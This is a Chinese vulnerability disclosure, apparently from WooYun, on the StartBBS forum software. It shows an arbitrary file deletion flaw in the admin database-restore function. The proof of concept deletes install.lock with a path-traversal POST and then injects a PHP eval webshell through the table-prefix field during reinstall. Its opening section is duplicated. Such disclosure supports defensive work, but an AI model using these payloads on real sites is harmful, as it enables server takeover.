### 简要描述: 找了好半天,感觉没太好的后台getshell的方法。 分析我以前交的一个前台getshell漏洞(http://wooyun.org/bugs/wooyun-2013-045143),就是通过重装来getshell的(最新版本v1.1.5任意重装的洞已经修了,但重装的位置依旧可以getshell),那么如果有一个任意文件删除洞的话,岂不就能删除.lock文件,来重新安装了呢?来getshell了呢? 我之前也一直用CI做开发,常参考startbbs的源码,在这里说声谢谢~ ### 详细说明: 后台代码app/controllers/admin/db_admin.php 75行 ``` public function restore($sqlfile='') { $data['title'] = '数据库还原'; $data['act']=$this->uri->segment(3); $data['sqlfiles'] = get_dir_file_info(FCPATH.'data/backup', $top_level_only = TRUE); if($_POST){ $sqlfiles=array_slice($this->input->post(), 0, -1); //echo var_export($sqlfiles); foreach($sqlfiles as $k=>$v){ unlink(FCPATH.'data/backup/'.$v); } $this->session->set_flashdata('error', '删除sql文件成功!'); redirect('admin/db_admin/restore'); } if($sqlfile){ $sql = file_get_contents(FCPATH.'data/backup/'.$sqlfile); if($this->run_sql($sql)){ $this->session->set_flashdata('error', '还原sql文件成功!'); redirect('admin/db_admin/restore'); } } $this->load->view('db_admin', $data); } ```...
### 简要描述: 找了好半天,感觉没太好的后台getshell的方法。 分析我以前交的一个前台getshell漏洞(http://wooyun.org/bugs/wooyun-2013-045143),就是通过重装来getshell的(最新版本v1.1.5任意重装的洞已经修了,但重装的位置依旧可以getshell),那么如果有一个任意文件删除洞的话,岂不就能删除.lock文件,来重新安装了呢?来getshell了呢? 我之前也一直用CI做开发,常参考startbbs的源码,在这里说声谢谢~ ### 详细说明: 后台代码app/controllers/admin/db_admin.php 75行 ``` public function restore($sqlfile='') { $data['title'] = '数据库还原'; $data['act']=$this->uri->segment(3); $data['sqlfiles'] = get_dir_file_info(FCPATH.'data/backup', $top_level_only = TRUE); if($_POST){ $sqlfiles=array_slice($this->input->post(), 0, -1); //echo var_export($sqlfiles); foreach($sqlfiles as $k=>$v){ unlink(FCPATH.'data/backup/'.$v); } $this->session->set_flashdata('error', '删除sql文件成功!'); redirect('admin/db_admin/restore'); } if($sqlfile){ $sql = file_get_contents(FCPATH.'data/backup/'.$sqlfile); if($this->run_sql($sql)){ $this->session->set_flashdata('error', '还原sql文件成功!'); redirect('admin/db_admin/restore'); } } $this->load->view('db_admin', $data); } ``` 这是一个进行数据库还原操作的函数,其中可以对已经备份好的数据库文件进行删除。但是没有验证文件名,导致可以任意文件删除。 代码直接取POST数组(最后一个变量除外,不知为什么),用foreach遍历之,然后删除所有$_POST数组中的值。 详见漏洞证明。 ### 漏洞证明: 登录后台,直接向index.php/admin/db_admin/restore/这个地址POST数据a=../../install.lock&b=x,想删除多少文件都行(加POST数组内容即可,键名随意,键值是你要删除的文件位置),但我只删除安装锁,.lock文件。 [<img src="https://images.seebug.org/upload/201405/11213639593d771b10fea0fed5de16b930a3cbf0.jpg" alt="009.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11213639593d771b10fea0fed5de16b930a3cbf0.jpg) 如上图,提示删除成功了。来到前台首页,发现跳转到安装页面了: [<img src="https://images.seebug.org/upload/201405/1121392114678448c85aaf244c90cf1e240d3eef.jpg" alt="010.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1121392114678448c85aaf244c90cf1e240d3eef.jpg) 顺理成章,重装系统。找一个可以外连的数据库,填好信息,然后在表前缀的位置填入一句话: ``` sb_';phpinfo();@eval ($_POST[101]);$xxx=' ``` [<img src="https://images.seebug.org/upload/201405/112143580e931956467aae289ce5ed474506e9f9.jpg" alt="011.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/112143580e931956467aae289ce5ed474506e9f9.jpg) 安装好以后,访问首页就能看到phpinfo了。菜刀直接连index.php,连数据库配置文件是不行的。 [<img src="https://images.seebug.org/upload/201405/1121455066f0e3d4b594bd46782addc2c81848a2.jpg" alt="012.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1121455066f0e3d4b594bd46782addc2c81848a2.jpg) 查看数据库配置文件,发现马已经安静地躺在那里了: [<img src="https://images.seebug.org/upload/201405/11214808a65b574f16cfdde6f534df97516f5540.jpg" alt="013.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11214808a65b574f16cfdde6f534df97516f5540.jpg)
